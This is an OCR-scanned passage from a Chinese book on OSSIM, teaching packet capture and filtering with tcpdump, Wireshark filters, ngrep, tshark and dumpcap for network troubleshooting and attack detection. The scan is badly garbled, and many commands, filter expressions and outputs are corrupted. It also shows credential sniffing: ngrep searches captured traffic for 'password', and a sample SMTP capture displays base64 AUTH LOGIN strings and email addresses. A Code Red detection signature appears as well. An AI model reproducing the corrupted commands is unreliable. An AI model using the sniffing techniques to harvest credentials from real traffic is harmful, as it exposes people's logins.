16 17 18 19 la 1b 1c 1d le 


10 11 12 13 14 15 
1f 20 21 22 23 24 25| 


26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35| 
36 37 


图 10-4 十 六 进 制 显示 包 内 容 


10.1.3” 抓 包 时 提示 “This traffic capture is empty” 的 解决 办 法 

当 抓 包 之 后 , 需 查 看 结果 , HI RAT Loud; m 009] C View Payload”), 系统 提示 “This 
traffic capture is empty”， 这 说 明 没 抓 到 有 效 数 据 包 ， 我 们 需要 调整 “Capture Options” 数 据 包 
选项 ， 在 “Cap Size” 选 项 中 默认 为 4000 packets， 这 时 试 着 将 滑 块 向 右 移动 ， 例 如 100~200 
之 间 ， 并 延长 抓 包 时 间 ， 与 此 同时 在 界面 中 把 RAW Filter 选项 后 面 清空 。 


10.1.4 ”远程 故障 排除 案例 


当 网 络 出 现 故 障 时 ,由 于 直接 用 tepdump 抓 包 分 析 有 些 困难 , 而 且 当 网 络 中 大 量 发 送 数据 
包 时 分 析 更 加 不 容易 ， 这 时 使 用 -w 参数 ， 然 后 配置 Wireshark 分 析 效 果 更 好 。 有 具体 参数 如 下 : 


#tcpdump -i eth0 -c 2000 -w eth0.cap 


€ -c2000: 表示 数据 包 的 个 数 。 


€ w: 表示 保存 cap 文件 ， 方 便 用 其 他 程序 分 析 。 


在 本 地 机 房 维护 时 ,如 遇 到 网 络 病毒 爆发 或 者 通信 故障 ， 管 理 员 会 通过 上 面 抓 包 方式 来 分 
析 故 障 ， 但 如 果 是 异地 机 房 出 了 同样 的 问题 ， 你 需要 在 远程 深度 分 析 网 络 数据 包 的 情况 ， 该 怎 
么 办 ? 你 可 能 需要 临时 联系 对 方 运 维 人 员 开始 配置 端口 镜像 ， 并 部 署 抓 包 设备 ， 而 这 种 低 效 的 


响应 方式 往往 耽误 了 分 析 故 障 的 最 佳 时 机 。 


下 面 我 们 看 看 通过 分 布 式 OSSIM 部 署 的 解决 方法 ， 公 司 总 部 C 部 署 一 台 高 性 能 OSSIM 
服务 器 ， 在 异地 分 公司 A 机 房 和 B 机 房 部 署 了 Sensor， 它 们 通过 VPN 和 Ossim Server 连接 。 
其 拓扑 如 图 10-5 所 示 ， 异 地 机 房 的 Sensor 分 别 连 入 交换 机 的 SPAN 口 ， 当 工作 需要 时 ， 能 够 


实时 抓 取 网 络 数据 。 


如 果 想 获取 网 卡 etho 中 除了 TCP 22 端 之 外 的 所 有 流量 ， 输 入 以 下 命令 : 
# tcpdump -nni eth0 'not (tcp and port 22) ' 


还 有 一 些 过 滤 方 法 参见 102 节 。 
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10-5 ”远程 数据 包 分 析 
当 A 机房 内 服务 器 出 现 故障 ， 可 以 连接 到 OSSIM 的 Web UI 界面 , 通过 Traffic capture 并 
选择 A 机 房 内 Sensor， 然 后 开始 抓 包 ， 并 进行 后 续 分 析 ， 这 样 的 部 署 大 大 提高 了 远程 机 房 之 
间 数 据 包 分 析 的 效率 。 


0.2 数据 包 过 滤 种 类 


收集 到 大 量 网 络 数据 之 后 ,需要 对 其 进行 一 定 的 处 理 , 也 就 是 过 滤 ， 这 种 过 滤 主 要 分 为 以 
下 4 种 : 
e 基于 主机 (OP) 的 流量 过 滤 ， 如 果 需 要 监控 的 信息 中 包含 某 个 IP， 那 么 就 可 以 采用 
这 种 基于 主机 的 过 滤 方 式 。 
e 基于 端口 的 流量 过 滤 ， 如 果 需 要 的 信息 中 包含 特定 端口 ( 源 端 口 和 目的 端口 ) ,那么 
就 可 以 用 这 种 方式 。 
e 基于 协议 + 端口 的 流量 过 滤 。 
e 基于 主机 + 端口 的 流量 过 小。 
大 家 先 了 解 以 下 几 种 操作 方法 : 
(1) tcp dst port 22 作用 : 显示 目的 TCP 端口 为 22 的 数据 包 。 
(2) ip src host 192.168.150.10 作用 : 显示 来 源 IP 地 址 为 192.168.150.10 的 数据 包 。 
(3) host 192.168.150.10 作用 : 显示 目的 或 来 源 IP 地 址 为 192.168.150.10 的 数据 包 。 


632 


第 10 章 ”基于 B/S 架构 的 数据 包 捕获 分 析 


(4) sre port range 3000~5500 显示 来 源 为 UDP zk TCP, 并 且 端 口号 在 3000-5500 范围 内 
的 数据 包 。 

(5) not icmp 显示 除了 ICMP 以 外 的 所 有 数据 包 。 

C6) src host 10.7.2.12 and not dst net 10.200.0.0/16 显示 来 源 IP 地 址 为 10.7.2.12， 但 目的 
地 不 是 10.200.0.0/16 的 数据 包 。 


用 Wireshark 打开 pcap 格式 数据 包 后 ， 每 条 消息 中 field 会 被 解析 出 来 ， 并 按照 协议 层次 
折 生 起 来 。 第 一 层 显 示 Frame XXX， 该 级 别 没有 对 应 某 层 具 体 的 协议 ， 而 是 对 本 条 消息 的 概 
括 性 总 结 ， 描 述 了 一 些 有 用 的 概括 性 信息 ， 比 如 从 里 面 我 们 可 以 看 到 本 条 消息 各 种 协议 的 层次 
关系 ， 展 开 其 他 协议 层 之 后 ， 对 应 该 协议 的 各 个 域 ， 如 果 需 要 使 用 过 滤 时 ， 可 以 使 用 以 上 介绍 
的 几 种 方法 ， 程 序 截获 数据 包 分 析 如 图 10-6 所 示 。 如 果 单 击 Graphs 按钮 ， 可 以 获取 到 更 多 有 
关 协 议和 流量 的 信息 。 


Start time:hed Jul 17 01:09:25 2013 End time:Wed Jul 17 01:09:35 2913 


Capture duration: seconds Number of packets:21 File size:l902 bytes gun Ww [Wc 1 


no. Tine Sosrce Destination Protocol Length 


2565 > 0000 [Sm sep wi 


5 4.164346 192.168.11.1 192.168.11.7 TP n 一 
6 4.165232 192.168.11.1 7 rcp Lj 
1 4.165299 191.168.11.1 7 TP n 
s 4.166721 192.168.11.1 3 TP n 
P 7.160316 d x n 
o 7.16593 7 vans » 
7 nans s2 


1L (192.166.11.1), TT 
Tuc KORTS 2679 (2479) DAE. PONE: EOM [BOR], ARO? D, LEN D 


+ 02:04:05:b4:04:02:08:0a:62:79:08:47:00:00:00:00:01:03:03:01 


I-1 TSvale165209)143 TSecr=0 WS-2 


Oe 47 00 00 00 90 01 03 03 01 


10-6 ”分析 数据 包 


i 如 果 分 布 式 OSSIM 系统 的 Sensor 出 现 问题 ,那么 该 功能 将 无 法 使 用 , 下 面 看 个 例子 ,Sensor 
[ 和 Server 通信 故障 将 影响 到 Ntop、Openvas 以 及 抓 包 功 能 的 使 用 。 


如 图 2-47 所 示 ， 此 时 在 操作 界面 的 左边 方 框 中 没有 找到 可 用 的 Sensor， 状 态 描述 为 “X” 
代表 不 可 用 。 这 时 抓 包 功能 无 法 使 用 。 
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全 运 维 平台 一 一 OSSIM 最 佳 实践 


过 滤 匹 配 表达 式 实例 


10.3.1 过滤 基础 

下 面 介绍 几 个 最 常用 的 关键 字 ,“eq” 和 “==” 等 同 ， 可 以 使 用 “and” 表 示 并 且 ,“or” 
表示 或 者 。“!” 和 “not” 则 表示 取 反 。 对 IP 地 址 的 过 滤 其 中 有 几 种 情况 : 

(1) 对 源 地 址 为 192.168.11.121 的 包 进 行 过 滤 ， 即 抓 取 源 地 址 满足 要 求 的 包 。 

表达 式 为 : ip.src == 192.168.11.121 

按照 此 方法 我 们 可 以 填写 到 过 滤 的 表单 中 ， 然 后 单 击 “Apply” 按 钮 ， 即 可 过 滤 出 结果 。 

如 果 输 入 地 址 没有 找到 ， 则 显示 “no data with this filter”， 则 说 明 过 滤 条 件 有 问题 。 

(20 对 目的 地 址 为 192.168.0.1 的 包 进 行 过 滤 ， 即 抓 取 目的 地 址 满足 要 求 的 包 。 

表达 式 为 : ip.dst= = 192.168.0.1 


G) 抓 取 匹 配 源 (或 者 目的 ) 地 址 的 IP 地址 是 192.168.0.1 的 封包 。 
表达 式 为 : ip.src == 192.168.0.1 or ip.dst= = 192.168.0.1 


10.3.2 ”协议 过 滤 
CD 仅 需要 捕获 某 种 协议 的 数据 包 ， 表 达 式 很 简单 ， 把 协议 的 名 字 输 入 即 可 。 
表达 式 为 : http 
在 进行 数据 包 过 滤 时 ， 在 “Filter: ”中 输入 http 即 可 ， 如 图 10-7 所 示 。 


Start tine: 
Capture durs 


:19 2015 End time:Mon Jan 


5 20:08:29 2015 
€ 


i» Mumbor of packete:2512 Pile sise:3 roter jn | UMEES ' E 


心 
wo. ion 

1536 sec 
1540 amrp 
1546 HITP/XML 
1753 sec 
2234 ssor 

310 saoe 
2325 sso 


TRANSFER PROTOCOL 
: GET /spnphzst/wdtisspi.dll?ccntentowiidicis -a18c-1665305b46: 


10-7 过 滤 Http 协议 


(20 排除 某 种 协议 的 数据 包 。 
表达 式 为 : !tcp 
排除 IP 协议 ;可 以 在 “Filter: ”中 输入 !ip 即 可 。 
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p 协议 名 称 是 小 写字 母 。 | 


10.3.3 ”对 端口 的 过 滤 
(1) 捕获 某 端 口 的 数据 包 ， 如 图 10-8 所 示 。 
表达 式 为 : tcp.port == 80 (注意 ，80 前 面 为 双 等 于 号 ) 


ee toU cL IUE LU T LM 
IET mm 本 
e ee 


图 10-8 ”端口 过 滤 
(2) 捕获 高 位 端口 (大 于 1024) 的 表达 式 : udp.port>= 2048 


10.3.4. ”对 包 长 度 的 过 滤 

分 析 一 组 数据 包 的 大 小 ， 会 发 现 很 多 问题 。 正 常情 况 下 ， 一 个 以 太 网 的 最 大 帧 长 为 1518 
字 节 ， 去 除 以 太 网 、IP 以 及 TCP k, 还 剩 1460 字 节 可 供应 用 层 协议 的 头 或 者 数据 使 用 。 那 么 
我 们 根据 这 个 原则 就 能 通过 捕获 数据 包 分 析 长 度 ， 了 解 其 分 布 ， 然 后 对 故障 进行 合理 的 分 析 ， 
下 面 我 们 看 看 如 何 通过 一 些 表达 式 多 包 进 行 过 滤 。 


针对 长 度 的 过 滤 (这 里 的 长 度 指定 的 是 数据 段 的 长 度 )， 如 图 10-9 所 示 。 
表达 式 为 : udp.length< 86 


Start timeiMon Jan 5 20:00:19 2015 End time:Mon Jan $ 20:08:29 2015 = 
Capture duration:10 seconds Nunber of packets:25:3 File size:361453 byces | Filter: [udp. length<86 j| Ww] | crear 
ve. Time Source Destination Protocol Length Info. 
is 0.405410 222.161.198.137 192.168.11.40 [3 n Source porti 12405 
203 — 0.472370 222.161.198.137 192.168.11.40 voe ee Source port: t: 12405 


图 10-9 UDP 长 度 过 滤 


以 太 网 头 部 为 14 字 节 (包括 了 4 字 节 的 CRC 校 验 )，IP 头 最 小 20 字 节 ， 没 有 数据 以 及 
选项 的 TCP 数据 包 也 是 20 字 节 ，TCP 用 于 控制 的 数据 包 ， 例 如 ACK、RST 以 及 FIN 的 大 小 
大 约 是 54 字 节 。 查 看 哪些 长 度 小 于 64 字 节 的 数据 包 。 

过 滤器 表达 式 为 : frame.len<=64 

效果 如 图 10-10 所 示 ， 同 样 方法 可 以 使 用 如 下 表达 式 : 

€ frame.number<=10: 表示 过 滤 帧 数 小 于 10 的 包 。 

€ framenumber- =10: 表示 过 滤 帧 数 为 10 的 包 。 
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timaion Jan 5 20:08:19 2015 Rod timeiMom J -— = : 
Se duratiomilü seconds Nuabar of packeterlSld J Titer: [Eee lenet O |ia) [Mcr] | (iones 
Bie pum RENE gom EA Info. 
3.000009 152,168.11.121 = 
2.000020 zer 
mm ES 3 445 Ian] ae mian64240 


Lenz Nas=1460 SACR_PERM=1 


10-10 帧 长 度 过 滤 


我 们 还 可 以 根据 IP 地 址 + 端口 进行 过 滤 ， 比 如 ， 在 “Filtter ”后 面 输入 
“ip.addr 一 192.168.11.1&& udp.port 一 53”， 效 果 如 图 10-11 所 示 。 


Start time:Sun Mar 22 07:33:02 20:5 End time:Sus Mar 22 0 


Capture duration:) seconds Number of packets:194 File size:56520 bytes Filter: [askrr-192168.111aaudpi 


v. Tine Source Destination protocol length 
0.000000 —— 192.168. 192.168.11.1 ws m pow 
0.01095000 —— 192.169.111 192.168 oss 105 Standard query rei 


图 10-11 根据 了 P+ 端 口 过 滤 


10.3.5 ngrep 过 滤 

ngrep 是 一 个 基于 Libpcap 开发 包 设计 的 工具 ， 可 以 根据 数据 包 中 的 字符 串 、 二 进 制 数据 
识别 出 感 兴趣 的 数据 包 ， 但 它 不 具备 数据 流 重 组 的 功能 。 如 果 匹 配 的 内 容 是 跨 数据 包 的 ， 则 
ngrep 无 法 检测 ， 如 果 ngrep 检测 到 匹配 ， 则 意味 着 该 数据 包 的 匹配 ， 而 不 是 数据 流 ， 过 滤 过 
程 如 图 10-12 所 示 。 


VirtualUSMAllIn0ne:-& ngrep -1 passwd.pcap "password' 
input: passwd.pcap 
match: password 


HHHEHHHHHHEHEN LÀ uH us uH Hh VUHHHHHHHHEHHHHHHEHHHHHHBHEHHHRHHRHHHHHHRHHHHRHRN E 
HHHEHHHHHHHEHEH Hh HBHIBHHHHHHEHHHHHHEHPHHHHHHEHHHHHHEHHHHHHHHPHHBHHHEHHHHHHEHHHHHHHHEHHHRHHRHHHHHHEHRHE 
HH a oi HUHHHHHHEHRHHHHHHBHE ud uH HHEHHBHHRHHHHHRHHHHHHHS HH 


DD A A A AR AAR 
T 211.159.65.16 -> 192.168.11.105:43945 [A] 
-"pass" type=" EEBENEE style= :left;wldth:126px; helght:36px; line-helght :30px; 
G:uril(images/index 94.jpg) ne «a style-"display:bl A 
e- e-heignt: 30px; width:89px;" hre ://wmnew.263.net/setpass.html" target- 
..eja»«/div».. «div align="center" style-"mergin-top:26px; width 


order:none; backgroun 
Lett; height:sepk; Uin 


10px; ficat : 


x «input name-"submitnew' type="button" value-"* onclick-"login('new');" style-'width:266px; 

:39px; border:none; background:url(images/index 32.jpq) no-repeat;cursor: ike </div>.. 
nter" — style-"margin-top:8px; dth:310px; floai .. «a href=" 
net /frontuserc/indexreg.js Diane «Ina sr dthz'266" heig 


rsor:pointer'»-/a» </div>. ..e/forn 

</div>. </div>. 2 <div 
Clase  tadcan n =a href-"/web/morelà 1.html"><ing src-"inages/index_95.jpg’ width-"174" height- 35"»«/am«/d 
iv>. <div ctess-"taocan_c"> «a hr ef-"http://mbill.263.net/frontuser/indexreg.]sp" target="_blank" class 
ntaocan C al*»... sn </a> «a href-"http://mbili.263.net/frontuser/indexreg.]sp' target-" blank 


" class=" 


图 10-12 ngrep 过 滤 


以 上 实例 如 果 需 要 用 十 六 进 制 方式 过 滤 可 以 使 用 “-x” 参 数 ， 加 入 更 多 过 滤 条 件 的 例子 如 
下 ， 仅 针对 所 有 源 IP 地 址 为 192.168.1.120 且 目 的 端口 为 80 的 匹配 数据 包 : 
#ngrep -I passwd.pcap "pass" 'src host 192.168.1.120 and port 80' 
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命令 行 工具 tshark 和 dumpcap 


上 一 节 讲 解 了 许多 过 滤 方 法 ， 将 这 些 方法 组 合 起 来 应 用 就 可 发 挥 出 强大 的 过 滤 效 果 。 
Wireshark 除了 GUI 工具 外 还 有 另外 两 个 命令 行 工具 tshark、dumpcap， 在 远程 环境 下 相当 
实用 。 


10.4.1 tshark 应 用 基础 

下 面 简单 介绍 tshark 常用 的 一 些 功能 。Tshark 是 命令 行 版 的 Wireshark 流量 分 析 器 ， 依 赖 
于 libpcap 流量 捕获 库 来 访问 数据 包 ， 平 常 远程 登录 时 抓 包 很 好 用 ， 而 且 可 以 直接 解析 ， 但 总 
是 不 记得 如 何 打印 出 原本 十 六 进 制 的 数据 ， 操 作 命令 如 下 : 


#tshark -w test.pcap -i eth0 -q 


© w: 将 抓 包 的 数据 写 入 文件 中 。 

€ -i: 指定 要 抓 包 的 接口 名 称 。 

€ q: 安静 ， 在 远程 时 最 有 用 ， 否 则 会 抓 到 SSH 的 报 文 。 

€ c 指定 要 读 取 的 包 文 件 。 

€ -x: 将 十 六 进 制 原始 包 数 据 打 印 出 来 。 

e -V: 显示 详细 信息 。 

操作 举例 ， 以 秒 为 单位 ， 统 计 IP 地 址 192.168.120.78 的 封包 、 字 节 数 量 ， 操 作 如 图 10-13 
所 示 。 


#tshark -z io,stat,l,ip.addr--192.168.120.78 


10-13 过滤 出 指定 IP 的 数据 包 
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实际 上 通过 对 网 络 数据 包 的 分 析 , 可 以 找到 不 少 网 络 攻击 过 程 中 的 奥秘 , 因为 所 有 的 网 络 
攻击 行为 是 通过 数据 包 传送 , 而 每 种 不 同 的 攻击 方式 在 网 络 上 都 会 产生 i. 比如 说 ， 
当 Syn Flooding 攻击 时 ， 网 络 上 立刻 会 产生 大 量 带 有 SYN 标志 位 的 数据 包 ， 通 过 抓 包 就 能 发 
现 , 再 如 Code red 蠕虫 在 感染 HIS. 时 , 在 网 络 上 也 会 出 现 发 送 给 Web 服务 器 80 pini 据 包 ， 
md X *GET/' .* ‘ida?’ * *XX' * ‘%u’ (4) '99u780' * ‘=’ .(7) ‘HTTP /1.0n' " 

FIERA R RE EL e 

作为 网 络 安全 人 员 , 我 们 要 善于 利用 Web 界面 的 Wireshark 来 分 析 网 络 的 攻击 行为 。 有 的 
攻击 产生 小 包 (< 64 Bytes)， 而 有 的 攻击 则 会 产生 巨人 帧 ， 我 们 通过 不 断 总 结 攻击 行为 ， 将 行 
为 特征 记录 到 数据 库 ， 这 样 就 能 形成 一 个 适合 企业 自身 的 病毒 查询 知识 库 。 


10.4.2 dumpcap 使 用 


dumpcap 使 用 和 tcpdump 类 似 。 下 面 展 示 利 用 dumpcap 捕获 ICMP 数据 包 的 例子 ， 如 图 
10-14 所 示 。 


VirtualAllInOne6x16B: /tmpit dumpcap -i eth® -c Z -w icmp.pcap -f "icmp and host 192.168.91.1" 
y on ethO 
icmp .pcap 


d on interface eth0: 0/0 (0.07) 


cpdump -r 
link-type El 
1A11InOne6x16B.alienvault: ICMP echo request, id 1, seq 5406, length 40 
"tual&lllnüne6xiGB.alienuault > localhost: ICMP echo reply, id 1, seq 5406, length 40 
Uirtualà11InQne6x1GB:^tmptt 


图 10-14. 捕获 ICMP 协议 


dumpcap 在 eth0 监听 ， 将 捕获 192.168.91.1 的 icmp 包 ， 保 存 到 当前 目录 下 icmp.pcap 文 
件 中 ， 然 后 我 们 用 tcpdump 工具 来 读 取 该 包 。 这 条 命令 的 功能 同样 通过 tcpdump 也 能 实现 ， 
再 用 dumpcap 命令 实现 ， 这 样 不 重复 吗 ? 其 实在 dumpcap 中 ， 不 必 加 入 -s 参数 指定 包 长 度 ， 
dumpcap 默认 抓 包 使 用 最 大 值 。 


10.4.3 用 tshark 分 析 pcap 

因为 dumpcap 默认 抓 包 为 最 大 值 ， 以 下 试验 的 pcap 文件 均 由 dumpcap 工具 抓 取 ， 存 储 为 
pcap 格式 。 

实例 1: 读 取 数据 包 ， 操 作 如 图 10-15 所 示 。 

#tshark -r icmp.pcap 


JirtualAllInOne6x16B:/tnplt tshark -r icmp.pcap 
: Error during load 


ho (ping) request id-0x0001, seq=7 
ho (ping) reply — id-0x0001, 


图 10-15 读 取 pcap 
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实例 2: 人 性 化 方式 显示 时 间 。 从 输出 看 出 tshark 默认 显示 时 间 为 0， 接 着 是 第 二 个 包 逝 
去 的 时 间 ， 但 这 种 时 间 显 示 方 式 难以 看 懂 ， 我 们 换 种 方式 显示 ， 使 用 了 “-t ad” 开 关 ， 如 图 
10-16 所 示 ， 这 样 更 方 


tual&llinüne6xiGB:tmps tshark -t ad -r icmp.pcap 
tshark: Lua: Error during loading 
Istring "/usrzsharezuireshark/init.lua"]:45: dofile has been disabled 
inning as user "root" and group "root". This could be dangerous 
1 2015-07-09 21.509569000 192.168.91.1 -> 192.168.91.226 ICMP 74 Echo (p equest id=0x0001, seq ， 
2 2015-6 21.509740000 192.168.91.226 -> 192.168.91.1 ICMP 74 Echo (ping) reply id=0x0001, se 11039, tt1-64 
D 


图 10-16 人 性 化 显示 时 间 


3: 在 tshark 中 显示 ICMP 应 答 响应 ， 如 图 10-17 所 示 。 


tapit tshark -t ad -r icmp.pcap -R “icnp.type 
ror during loading 
are/uireshark/init.1ua"]:45: dofile has been disabled 
inning a root" and group "root". This could be dangerou: 
2015-07-09 23:22:21.509740000 192.168.91.226 -> 192.168.91.1 ICMP 74 Echo (ping) reply ^ id-0x0001, seq-7979/11039, tt1=64 
rtua lAl InÜne6x1GB: /tmpit 


图 10-17 显示 ICMP 应 答 响应 


实例 4: 显示 包 详 细 信 息 。 如 果 在 tshark -tad —r icmp.pcap -R "icmp.type== 0" 这 条 命令 后 
面 加 上 -x -V 参数 ， 分 别 表 示 以 十 六 进 制 和 详细 解码 ， 如 图 10-18 所 示 。 


JirtualAllInOne6x16B:/tnp# tshark -t ad -r icmp.pcap -R “icnp.type 
Error during loading 
usr/share/wireshark/init. lua 5: dofile has been disabled 
as user "root" and group "root". This could be dangerous 
2: 74 bytes on uire (592 bits), 74 bytes captured (592 bits) on interface 0 
Interface id: 9 
WTAP_ENCAP: 1 
Arrival Time 0 22:21.509740000 EDT 
[Time shift fo s packet: 0.000000000 seconds] 
Epoch Time: 1436498 0000 seconds 
[Time delta from previous captured frame 
[Time delta from previous displayed fra 
[Time since reference or first frane 
Frame Number: 2 
Frame Length: 74 bytes (592 bits) 
Capture Length: 74 bytes (592 bits) 
[Frane is marked: False] 
[Frane is ignored: False] 
[Protocols in frame: eth:ip:icnp:data] 
Ethernet II, Src: Unware_ca:2d:52 (00:0c:29:ca Dst: Unware c0:00:08 (00:50:56:c0:00:08) 
Destination: Unuare c0:00:08 (00:50:56:c0:00:08) 
Address: Unuare c0:00:08 (00:50:56:c0:00:08) 
LG bit: Globally unique address (factory default) 
IG bit: Indiuidual address (unicast) 
Source: Unware ca:2d:52 (00:0c:29:ca:2d:52) 
Unuare ca:2d:52 (00:0c:29:ca:2d:52) 
LG bit: Globally unique address (factory default) 
EN IG bit: Individual address (unicast) 
Type: IP (Ox 
t Protocol U rc: 192.168.91 (192.168.91.226), Dst: 192.168.91.1 (192.168.91.1) 
sion: 4 
Header length: 20 bytes 
Differentiated Services Field: 0x09 (DSCP 0x09: Default; ECN: 0x00: Not-ECT (Mot ECN-Capable Transport)) 
0000 00.. = Differentiated Services Codepoint: Default (0x00) 
00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00) 
Total Length: 6 
Identification: Oxee64 (61028) 
Flags: 0x00 
- Reserued bit: Mot set 
Don't fragment: Mot set 
Not set 


Fragment offset 

Time to lic 

Protocol: 

Header checksum 428 [cori 
[Good: Truel 
[Bad: False] 

Source: 192.168.91.226 (192 


图 10-18 ”显示 包 的 详细 信息 
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在 SIEM 控制 台中 的 这 er iter Ra Ann tshark tree.php, 
使 用 tshark 来 读 取 抓 取 peap 包 ， 数 据 分 析 后 最 终 通 过 Web. 界面 展示 给 用 户 。 更 多 抓 包 样本 从 


这 个 链接 获取 : https://wiki.wireshark.org/SampleCaptures。 
实例 5: 搜索 SMTP 流量 ， 这 里 使 用 了 smtp.req.command 过 滤器 ， 如 图 10-19 所 示 。 


tshark -t ad -r sntp.pcap -R ’sntp.req.comnand’ 
loading 


Ww 


63 C: EHLO GP 
08.56872: 0 4 -> 3.14 66 C: RUTH LOGIN 

68.911655 4 ET 84 C: Z3UgcGFudGFuQHBhdHJpb3RzLn lu 
[e 0 42 3.140 72 C: cHUuanF iQDEyMu: 

99 414 6.19.1.4 -> 53.14 E] MAIL FROM: <gurpartapepatriots. in> 
69.9 4 NT 93 C: RCPT TO: «raj deol2002inGyahoo.co. in| 
10 2t 0 4 > 40 E 60 C: DATA 

14 9 4 > 140.153 SMTP 60 C: QUIT 


图 10-19 搜寻 SMTP 流量 
实例 6: 搜寻 两 主机 间 通 信 。 下 面 的 例子 需要 过 滤 两 条 主机 之 间 的 流量 ， 首 先 从 我 的 


博客 下 载 aim.pcap 包 ， 接 着 用 tshark 提取 从 网 络 捕获 的 aim.pcap 包 中 的 所 有 AIM 消息 ， 
输入 如 下 命令 : 


#tshark - aim.pcap -d tcp.port--443,aim -T fields -n -e 


C 
C 


"aim.messageblock.message" 


接着 你 会 看 到 它们 之 间 的 通信 。 下 面 我 们 利用 tepdumpde BPF 过 滤 功 能 ， 将 主机 之 间 的 
SSL 通信 提取 出 来 ， 如 图 10-20 所 示 。 


virtualAllIinOne6x1GB:/tmp# tcpdump -s © -r aim.pcap -u aim-talker.pcap ’host 64.12.24.50 and host 192.168.1.158’ 
reading fron file aim.pcap, link-type EN10MB (Ethernet) 
VirtualAllInOne6x16B: /tmptt tshark -r ain-talker.pcap 
tshark: L or during loading 
Istring "/usrvsharevuiresharkzinit .lua"1:45: dofile has been disabled 
Running as user "root" and group "root". This could be dangerou 
000000 192 ,168.1.158 -> 64.12.24.50 SSL 69 Continuation Data 
000579 64 24.50 -> 192.168.1.158 TCP 60 https > 51128 [ACK] Seq=1 Ack=? Win=64240 Len=0 
5.044068 168.1.158 -> 2.24.50 SSL 243 Continuation Data 
9 4.12.2 > 60 https > 51128 [ACK] Seq-1 Ack=196 Win=64240 Len-0 
15.135701 192.168.1.158 A 24.50 L 94 Continuation Data 
15.135796 64 > 192.168.1.158 TCP 60 https > 51128 [ACK] Seq=1 Ack=236 Win=64240 Len 
15.152349 64 2 168 1 158 SSL 263 Continuation Data 


图 10-20 两 主机 间 SSL 通信 
青 求 操作 如 下 : 


alienvault:^& tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&Oxf)««2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R 'http.re 
quest.method GET" || http.request.method == "HEAD"' 

tshark: Lua: Error during loading: 
[string "/usr/share/wireshark/init 
Running as user "root" and group " 
Capturing on ethe 


用 tshark 抓 取 HTTP 过 滤 


"]:45: dofile has been disabled 
- This could be dangerous. 


06.000000 192.168.11.129 -> 202.108.33.60 HTTP 287 GET / HTTP/1.0 
2.028938 192.168.11.129 -> 202.108.33.60 HTTP 290 GET / HTTP/1.0 
74.843823 192.168.11.129 -> 66.102.251.33 HTTP 283 GET / HTTP/1.0 
77.072560 192.168.11.129 -> 202.108.33.60 HTTP 287 GET / HTTP/1.0 
79.094601 192.168.11.129 -> 202.108.33.60 HTTP 290 GET / HTTP/1.0 
87.197244 192.168.11.129 -> 129.42.38.1 HTTP 282 GET / HTTP/1.0 

89.532045 192.168.11.129 -> 221.204.163.25 HTTP 286 GET / HTTP/1.0 


同样 ，HTTP 中 与 服务 器 交互 的 其 他 方法 POST, PUT. DELETE 都 可 以 根据 以 上 命令 轻 
松 实现 。 下 面 再 看 一 个 例子 ， 过 滤 HTTP 请 求 中 的 网 址 ， 操 作 如 下 : 
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alienvault:~# tshark -i ethO tcp port 80 -R 'ip' -T fields -e ip.src -R 'http.request' -T fields -e http.host 
-e http.request.uri 
tshark: Lua: Error during loading: 

[string "/usr/share/wireshark/init.lua"]:45: dofile has been disabled 
Running as user "root" and group "root". This could be dangerous 
Capturing on ethe 
192.168.11.129 ibm.com / 
192.168.11.129 www. ibm. com / 
192.168.11.129 www. ibm. com /us/en/ 
192.168.11.129 mail.126.net / 
192.168.11.129 www.sina.com.cn / 


192.168.11.129 tech.sina.com.cn /z/sinawap/ 
192.168.11.129 weibo.com /58330 
192.168.11.129 passport.weibo.com /visitor/visitor?entry-miniblog&a-enter&url-http*3AW2F&s2Fweibo.com&2F5 


8330&donain-.weibo.com&sudaref-https3AW2F&2Ftech. sina.com.cn&2Fz&2Fsinawap&2F&ua-php-sso sdk client-0.6.14& ra 
d-1442011777.0789 
192.168.11.129 www.google.com / 


使 用 tcpdump 过 滤器 


平时 我 们 只 用 tcpdump 进行 抓 包 分 析 , 进行 数据 包 分 析 主 要 掌握 协议 字段 (从 协议 字段 中 
提取 数据 )、 匹 配 模式 (通过 查找 数据 包 中 的 特定 值 找 出 感 兴趣 数据 包 )， 过 滤器 是 一 种 高 级 用 
法 ， 用 于 限制 tepdump 及 其 他 工具 显示 或 捕获 的 流量 。 过 滤器 有 时 被 简称 为 BPF (Berkeley 
Packet Filter)， 过 滤 就 是 去 除 见 余 的 部 分 ， 标 记 出 感 兴趣 内 容 ， 下 面 举 几 个 操作 实例 。 


10.5.1 ”tcpdump 过 滤器 基础 
我 们 首先 了 解 tcpdump 的 几 个 重要 参数 。 
© -n: 告知 tcpdump 不 要 通过 DNS 查询 将 IP 地 址 解析 为 主机 名 。 
€ os 告知 每 个 数据 包 捕 获 多 少 字 节 ， -s 0 表示 整个 数据 包 。 
€ ~c: 捕获 多 少 个 数据 包 。 


实例 1， 只 捕获 10 个 ICMP 数据 包 ， 操 作 如 下 : 


VirtualUSMAllInOne:-£ tcpdump -n -i ethO -c 10 -w icmp.pcap 

tcpdump: listening on ethO, link-type EN10MB (Ethernet), capture size 65535 bytes 
10 packets captured 

10 packets received by filter 

O packets dropped by kernel 

VirtualUSMAllInOne:-4 


为 了 读 取 跟踪 ， 使 用 tepdump 的 -r 参数 : 
#tcpdump -n -r icmp.pcap 
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VirtuaLUSMALLInone:-# tcpdump -n -r icmp.pcap 

reading from file icmp.pcap, link-type EN10MB (Ethernet) 

11:44:41.076050 IP 192.168.11.6 > 192.168.11.105: ICMP echo request, id 1, seq 769, length 40 

11:44:41.076143 IP 192.168.11.105 > 192.168.11.6: ICMP echo reply, id 1, seq 769, length 40 

11:44:41.078034 IP 192.168.11.6 > 61.148.185.181: ICMP echo request, id 1, seq 770, length 40 

11:44:41.080897 IP 61.148.185.181 > 192.168.11.6: ICMP echo reply, id 1, seq 770, length 40 

11:44:41.214701 IP 192.168.11.1.4680 > 192.168.11.6.21: Flags [S], seq 3135961814, win 5840, options [mss 1460,s: 
ckOK.TS val 300313904 ecr O.nop.wscale 11. lenath 0 


实例 2: 查找 特定 端口 流量 。 
如 果 不 使 用 icmp， 还 可 以 通过 TCP, UDP 选项 来 捕获 其 他 特定 流量 , 例如 为 了 查找 DNS 
故障 ， 可 捕获 端口 53 的 数据 包 。 


|VirtualUSMAllIn0ne:-4 tcpdump -n -i ethO -s © port 53 
|tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
|listening on ethO, link-type ENIOMB (Ethernet), capture size 65535 bytes 


